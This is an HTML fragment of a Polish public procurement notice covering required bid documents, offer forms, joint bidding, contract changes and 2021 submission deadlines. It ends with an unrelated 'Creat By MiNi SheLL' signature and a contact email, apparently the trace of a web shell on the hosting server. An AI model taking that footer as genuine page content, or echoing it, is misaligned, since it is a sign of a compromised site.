Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej – w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Forma dokumentu: dokument w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, lub dokument jako cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga dokumentów na potwierdzenie spełnienia warunków udziału w postępowaniu.<br/><br/>Uwaga: <br/>W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, należy przedłożyć oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału <br/>w postępowaniu (w zakresie spełnienia warunków udziału w postępowaniu wskazanym przez Zamawiającego), zgodnie z Załącznikiem Nr 3 do SWZ; Oświadczenie należy złożyć wraz <br/>z ofertą; <br/><br/>Forma oświadczenia: dokument w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, lub dokument jako cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę należy sporządzić zgodnie z wzorem Formularza ofertowego stanowiącym Załącznik Nr 1 do SWZ. W przypadku rozbieżności pomiędzy treścią w elektronicznym, ustandaryzowanym formularzu oferty (nazywana w Systemie jako „Oferta podstawowa”) wypełnianym przez Wykonawcę w Systemie podczas składania oferty, a treścią Formularza ofertowego sporządzonego wg wzoru stanowiącego Załącznik Nr 1 do SWZ i załączonego do oferty, za obowiązującą przyjmuje się treść Formularza ofertowego sporządzonego wg wzoru stanowiącego Załącznik Nr 1 do SWZ podpisanego prawidłowo, zgodnie z reprezentacją. Przekazanie elektronicznego ustandaryzowanego formularza oferty wypełnianego przez Wykonawcę w Systemie, nie stanowi złożenia oferty zgodnie z wymaganiami SWZ.<br/>Ponadto do oferty należy załączyć:<br/>1.	Formularz ofertowy, zgodnie z wzorem stanowiącym Załącznik nr 1 do SWZ;<br/>2.	Wykaz asortymentowo-cenowy, zgodnie z wzorem stanowiącym Załącznik nr 2 (odpowiednio 2.1 i 2.2) SWZ;<br/>3.	Oświadczenia, o których mowa w Rozdziale X pkt. 1 ppkt.1) lit. a) SWZ, zgodnie z wzorem stanowiącym Załącznik nr 3 do SWZ;<br/>4.	Zobowiązanie podmiotu, o którym mowa w Rozdziale XI SWZ lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tego podmiotu zgodnie z wzorem stanowiącym Załącznik Nr 4 do SIWZ (jeżeli dotyczy);<br/>5.	Pełnomocnictwa (jeżeli dotyczy).<br/>6.	Uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa, o którym mowa w pkt. 20 poniżej (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w Rozdziale X pkt.1 ppkt.1) lit.a) SWZ (oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp), składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym we Wzorze umowy, stanowiącym Załącznik Nr 5 do SWZ.<br/>Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-24 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ezamowienia.ms.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-24 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Szczegółowe informacje dot. środków ochrony prawnej określone są w dziale IX Środki ochrony prawnej ustawy Pzp

Creat By MiNi SheLL
Email: jattceo@gmail.com